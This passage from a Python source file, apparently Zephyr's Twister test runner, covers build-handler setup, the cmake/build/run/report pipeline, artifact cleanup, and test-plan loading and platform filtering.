self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
self.seed = kwargs.get('seed', 0)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testsuite.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
# Here we check the runtime filter results coming from running cmake
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "filtered"
self.instance.reason = "runtime filter"
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped")
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
if self.instance.status == "skipped":
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped", self.instance.reason)
if res.get('returncode', 1) > 0:
self.instance.add_missing_testscases("blocked", self.instance.reason)
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.testplan = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed"]:
if instance.status == "error":
results.error += 1
else:
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testsuite.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status in ["skipped", "filtered"]:
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testsuite.testcases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for case in instance.testcases:
if case.status == 'skipped':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status in ["skipped", "filtered"]:
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.execution_time
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
if ( instance.status in ["error", "failed", "timeout", "flash_error"]
and hasattr(self.instance.handler, 'seed')
and self.instance.handler.seed is not None ):
more_info += "/seed: " + str(self.seed)
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do, instance.platform.name,
instance.testsuite.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testsuite.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.testplan = self.testplan
if self.seed is not None and instance.platform.name.startswith("native_posix"):
self.parse_generated()
if ('CONFIG_FAKE_ENTROPY_NATIVE_POSIX' in self.defconfig and
self.defconfig['CONFIG_FAKE_ENTROPY_NATIVE_POSIX'] == 'y'):
instance.handler.seed = self.seed
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.testplan.enable_size_report and not self.testplan.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.execution_time
class TestPlan(DisablePyTestCollectionMixin):
config_re = re.compile(r'(CONFIG_[A-Za-z0-9_]+)="?([^"]*)"?$')
dt_re = re.compile(r'([A-Za-z0-9_]+)="?([^"]*)"?$')
ts_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testsuite-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testsuite_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"testcases": {"type": "list", "default": []},
"platform_type": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}},
"seed": {"type": "int", "default": 0}
}
SAMPLE_FILENAME = 'sample.yaml'
TESTSUITE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=None, testsuite_roots=None, outdir=None):
# None defaults avoid sharing mutable default lists between instances
self.roots = testsuite_roots if testsuite_roots is not None else []
if board_root_list is None:
self.board_roots = []
elif not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Test Plan Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.detailed_skipped_report = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
self.seed = 0
# Keep track of which test cases we've filtered out and why
self.testsuites = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
self.timestamp = datetime.now().isoformat()
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testsuite.testcases)
if instance.status == 'filtered':
results.skipped_filter += 1
results.skipped_configs += 1
elif instance.status == 'passed':
results.passed += 1
results.done += 1
elif instance.status == 'error':
results.error += 1
results.done += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
jt = json.load(fp)
for ts in jt.get("testsuites", []):
d = {}
for m, _, _ in interesting_metrics:
d[m] = ts.get(m, 0)
ts_name = ts.get('name')
ts_platform = ts.get('platform')
saved_metrics[(ts_name, ts_platform)] = d
for instance in self.instances.values():
mkey = (instance.testsuite.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
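# Delta sketch (illustrative numbers): if the saved report recorded
# rom_size == 14000 for a (suite, platform) pair and the current build
# measures 14512, the tuple (instance, "rom_size", 14512, 512, True) is
# appended ("lower is better" applies to both tracked metrics).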
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testsuite.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
# FIXME: need a better way to identify executed tests
handler_time = instance.metrics.get('handler_time', 0)
if float(handler_time) > 0:
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed + results.error,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
built_only = results.total - run - results.skipped_configs
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{built_only}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, platform_reports):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
json_file = filename + ".json"
self.json_report(json_file, version=self.version)
self.xunit_report(json_file, filename + ".xml", full_report=False)
self.xunit_report(json_file, filename + "_report.xml", full_report=True)
self.xunit_report_suites(json_file, filename + "_suite_report.xml")
if platform_reports:
self.target_report(json_file, outdir, suffix)
def target_report(self, json_file, outdir, suffix):
platforms = {inst.platform.name for inst in self.instances.values()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(json_file, filename, platform, full_report=True)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
testcases = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
testcases.append(case)
return testcases
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testsuites(self, testsuite_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTSUITE_FILENAME in filenames:
filename = self.TESTSUITE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
ts_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(ts_path, self.ts_schema)
parsed_data.load()
ts_path = os.path.dirname(ts_path)
workdir = os.path.relpath(ts_path, root)
for name in parsed_data.tests.keys():
ts = TestSuite(root, workdir, name)
ts_dict = parsed_data.get_test(name, self.testsuite_valid_keys)
ts.source_dir = ts_path
ts.yamlfile = ts_path
ts.type = ts_dict["type"]
ts.tags = ts_dict["tags"]
ts.extra_args = ts_dict["extra_args"]
ts.extra_configs = ts_dict["extra_configs"]
ts.arch_allow = ts_dict["arch_allow"]
ts.arch_exclude = ts_dict["arch_exclude"]
ts.skip = ts_dict["skip"]
ts.platform_exclude = ts_dict["platform_exclude"]
ts.platform_allow = ts_dict["platform_allow"]
ts.platform_type = ts_dict["platform_type"]
ts.toolchain_exclude = ts_dict["toolchain_exclude"]
ts.toolchain_allow = ts_dict["toolchain_allow"]
ts.ts_filter = ts_dict["filter"]
ts.timeout = ts_dict["timeout"]
ts.harness = ts_dict["harness"]
ts.harness_config = ts_dict["harness_config"]
if ts.harness == 'console' and not ts.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
ts.build_only = ts_dict["build_only"]
ts.build_on_all = ts_dict["build_on_all"]
ts.slow = ts_dict["slow"]
ts.min_ram = ts_dict["min_ram"]
ts.modules = ts_dict["modules"]
ts.depends_on = ts_dict["depends_on"]
ts.min_flash = ts_dict["min_flash"]
ts.extra_sections = ts_dict["extra_sections"]
ts.integration_platforms = ts_dict["integration_platforms"]
ts.seed = ts_dict["seed"]
testcases = ts_dict.get("testcases", [])
if testcases:
for tc in testcases:
ts.add_testcase(name=f"{name}.{tc}")
else:
ts.parse_subcases(ts_path)
if testsuite_filter:
if ts.name and ts.name in testsuite_filter:
self.testsuites[ts.name] = ts
else:
self.testsuites[ts.name] = ts
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (ts_path, e))
self.load_errors += 1
return len(self.testsuites)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
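
    # Illustrative sketch (hypothetical data): a quarantine yaml entry such as
    #   - scenarios: [kernel.common]
    #     platforms: [native_posix]
    #     comment: "flaky under heavy load"
    # ends up in self.quarantine as
    #   {"native_posix.kernel.common": "flaky under heavy load"}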
def load_from_file(self, file, filter_platform=[]):
with open(file, "r") as json_test_plan:
jtp = json.load(json_test_plan)
instance_list = []
for ts in jtp.get("testsuites", []):
logger.debug(f"loading {ts['name']}...")
testsuite = ts["name"]
platform = self.get_platform(ts["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testsuites[testsuite], platform, self.outdir)
if ts.get("run_id"):
instance.run_id = ts.get("run_id")
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.metrics['handler_time'] = ts.get('execution_time', 0)
instance.metrics['ram_size'] = ts.get("ram_size", 0)
instance.metrics['rom_size'] = ts.get("rom_size",0)
status = ts.get('status', None)
reason = ts.get("reason", "Unknown")
if status in ["error", "failed"]:
instance.status = None
instance.reason = None
# test marked as passed (built only) but can run when
# --test-only is used. Reset status to capture new results.
elif status == 'passed' and instance.run and self.test_only:
instance.status = None
instance.reason = None
else:
instance.status = status
instance.reason = reason
for tc in ts.get('testcases', []):
identifier = tc['identifier']
tc_status = tc.get('status', None)
tc_reason = None
# we set reason only if status is valid, it might have been
# reset above...
if instance.status:
tc_reason = tc.get('reason')
if tc_status:
case = instance.set_case_status_by_name(identifier, tc_status, tc_reason)
case.duration = tc.get('execution_time', 0)
if tc.get('log'):
case.output = tc.get('log')
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testsuite_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
            # When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
            self.verify_platforms_existence(platform_filter, "platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testsuite list...")
for ts_name, ts in self.testsuites.items():
if ts.build_on_all and not platform_filter:
platform_scope = self.platforms
elif ts.integration_platforms and self.integration:
self.verify_platforms_existence(
ts.integration_platforms, f"{ts_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in ts.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and ts.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if ts.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
ts.platform_allow, f"{ts_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in ts.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in ts.platform_allow, \
self.platforms))
# list of instances per testsuite, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(ts, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if ts.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (ts.type == "unit"):
# Discard silently
continue
if ts.modules and self.modules:
if not set(ts.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(ts.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and ts.integration_platforms and plat.name not in ts.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if ts.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not ts.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testsuite tag filter")
if exclude_tag and ts.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testsuite exclude filter")
if testsuite_filter and ts_name not in testsuite_filter:
discards[instance] = discards.get(instance, "TestSuite name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testsuite arch filter")
if not force_platform:
if ts.arch_allow and plat.arch not in ts.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if ts.arch_exclude and plat.arch in ts.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if ts.platform_exclude and plat.name in ts.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if ts.toolchain_exclude and toolchain in ts.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if ts.platform_allow and plat.name not in ts.platform_allow:
discards[instance] = discards.get(instance, "Not in testsuite platform allow list")
if ts.platform_type and plat.type not in ts.platform_type:
discards[instance] = discards.get(instance, "Not in testsuite platform type list")
if ts.toolchain_allow and toolchain not in ts.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testsuite toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and ts.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < ts.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if ts.depends_on:
dep_intersection = ts.depends_on.intersection(set(plat.supported))
if dep_intersection != set(ts.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < ts.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
if set(plat.ignore_tags) & ts.tags:
discards[instance] = discards.get(instance, "Excluded tags per platform (exclude_tags)")
